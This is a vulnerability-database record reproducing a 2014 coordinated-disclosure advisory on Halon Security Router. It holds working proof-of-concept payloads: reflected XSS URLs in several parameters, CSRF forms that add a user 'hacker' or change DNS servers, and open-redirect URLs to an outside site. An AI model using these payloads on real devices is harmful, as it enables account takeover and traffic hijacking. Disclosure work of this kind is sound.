Halon Security Router (SR) 3.2-winter-r1 - Multiple Security Vulnerabilities

2014-07-01T00:00:00

Description

No description provided by source.

{"title": "Halon Security Router (SR) 3.2-winter-r1 - Multiple Security Vulnerabilities", "bulletinFamily": "exploit", "published": "2014-07-01T00:00:00", "lastseen": "2017-11-19T13:23:31", "modified": "2014-07-01T00:00:00", "reporter": "Root", "viewCount": 3, "sourceHref": "https://www.seebug.org/vuldb/ssvid-86018", "status": "poc", "href": "https://www.seebug.org/vuldb/ssvid-86018", "description": "No description provided by source.", "type": "seebug", "enchantments_done": [], "references": [], "enchantments": {"score": {"value": -0.2, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": -0.2}, "sourceData": "\n ADVISORY INFORMATION\r\nAdvisory Name: Multiple Security Vulnerabilities in Halon Security Router\r\nDate published: 2014-04-07\r\nVendors contacted: Halon Security (http://www.halon.se)\r\nResearcher: Juan Manuel Garcia (http://www.linkedin.com/in/juanmagarcia)\r\n\r\n\r\n\r\nVULNERABILITIES INFORMATION\r\nVulnerabilities:\r\n1. Reflected Cross-Site Scripting (XSS) {OWASP Top 10 2013-A3}\r\n2. Cross-site Request Forgery (CSRF) {OWASP Top 10 2013-A8}\r\n3. Open Redirect {OWASP Top 10 2013-A10}\r\n\r\nSeverities:\r\n1. Reflected XSS: Medium - CVSS v2 Base Score: 5.5 (AV:N/AC:L/Au:S/C:P/I:P/A:N)\r\n2. CSRF: High - CVSS v2 Base Score: 6.5 (AV:N/AC:L/Au:S/C:P/I:P/A:P)\r\n3. Open Redirect: High - CVSS v2 Base Score: 6.5 (AV:N/AC:L/Au:S/C:P/I:P/A:P)\r\n\r\nAffected Applications: Security router (SR) v3.2-winter-r1 and earlier.\r\n\r\nAffected Platforms: Software, virtual and hardware\r\n\r\nLocal / Remote: Remote\r\n\r\nVendor Status: Patched\r\n\r\n\r\n\r\nVULNERABILITIES DESCRIPTION\r\n1. Reflected XSS: https://www.owasp.org/index.php/Cross-site_Scripting_%28XSS%29\r\n2. CSRF: https://www.owasp.org/index.php/Cross-Site_Request_Forgery_%28CSRF%29\r\n3. Open Redirect: https://www.owasp.org/index.php/Open_redirect\r\n\r\n\r\n\r\nTECHNICAL DESCRIPTION AND PROOF OF CONCEPTS\r\n1- Reflected XSS:\r\nAt least the following parameters are not properly sanitized:\r\n http://sr.demo.halon.se/commands/logviewer/?log=vic0';</script><script>alert(1)</script>\r\nParameter: log\r\n http://sr.demo.halon.se/fileviewer/?file=";</script><script>alert(1)</script>\r\nParameter: file\r\n http://sr.demo.halon.se/system/graphs/?graph='+alert(1)+'\r\nParameter: graph\r\n http://sr.demo.halon.se/commands/?command='+alert(1)+'\r\nParameter: command\r\n http://sr.demo.halon.se/system/users/?id='+alert(1)+'\r\nParameter: id\r\n http://sr.demo.halon.se/config/?uri='+alert(1)+'\r\nParameter: uri\r\nOther parameters of the application might also be affected.\r\n\r\n\r\n2- CSRF:\r\nAt least the following functions are vulnerable:\r\n Add user: http://xxx.xxx.xxx.xxx/system/users/?add=user\r\n\r\n<html>\r\n<body>\r\n<form method="POST" name="form0" action="http://localhost:80/system/users/?add=user">\r\n<input type="hidden" name="checkout" value="17"/>\r\n<input type="hidden" name="apply" value=""/>\r\n<input type="hidden" name="id" value=""/>\r\n<input type="hidden" name="old_user" value=""/>\r\n<input type="hidden" name="user" value="hacker"/>\r\n<input type="hidden" name="full-name" value="ITFORCE H4x0r"/>\r\n<input type="hidden" name="class" value=""/>\r\n<input type="hidden" name="password" value="1234"/>\r\n<input type="hidden" name="password2" value="1234"/>\r\n</form>\r\n</body>\r\n</html>\r\n\r\nDNS configuration: http://xxx.xxx.xxx.xxx/network/dns\r\n\r\n<html>\r\n<body>\r\n<form method="POST" name="form0" action="http://localhost:80/network/dns/">\r\n<input type="hidden" name="checkout" value="17"/>\r\n<input type="hidden" name="apply" value=""/>\r\n<input type="hidden" name="name-servers" value="8.8.8.8"/>\r\n<input type="hidden" name="search-domain" value=""/>\r\n<input type="hidden" name="host-name" value="sr.demo.halon.se"/>\r\n</form>\r\n</body>\r\n</html>\r\n\r\n Network Configuration: http://xxx.xxx.xxx.xxx/network/basic\r\n Load Balancer Configuration: http://xxx.xxx.xxx.xxx/network/loadbalancer\r\n VPN Configuration: http://xxx.xxx.xxx.xxx/network/vpn\r\n Firewall Configuration: http://xxx.xxx.xxx.xxx/network/firewall\r\nOther functions of the application might also be affected.\r\n\r\n\r\n3- Open Redirect:\r\nAt least the following parameters are not properly sanitized:\r\n http://sr.demo.halon.se/cluster/?switch_to=&uri=http://itforce.tk\r\nParameter: uri\r\n http://sr.demo.halon.se/config/?checkout=17&uri=http://itforce.tk\r\nParameter: uri\r\nOther parameters of the application might also be affected.\r\n\r\n\r\n\r\nSOLUTION\r\nInstall / Upgrade to Security router (SR) v3.2r2\r\nREPORT TIMELINE\r\n\r\n2014-04-03: IT Force notifies the Halon team of the vulnerabilities and receives the support ticket ID ZOJ-105816.\r\n2014-04-04: Vendor acknowledges the receipt of the information and informs that the vulnerabilities are going to be resolved in v3.2r2 and updates the SR online demo site.\r\n2014-04-04: IT Force advises Halon on how to resolve the vulnerabilities reported.\r\n2014-04-04: IT Force coordinate with Halon the advisory publication for April 07,2014.\r\n2014-04-07: IT Force published the advisory.\r\n\r\n\r\n\r\nCONTACT INFORMATION\r\nwww.itforce.tk\r\n\n ", "cvss": {"vector": "NONE", "score": 0.0}, "cvelist": [], "id": "SSV:86018", "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645523782, "score": 1659785532, "epss": 1678848988}}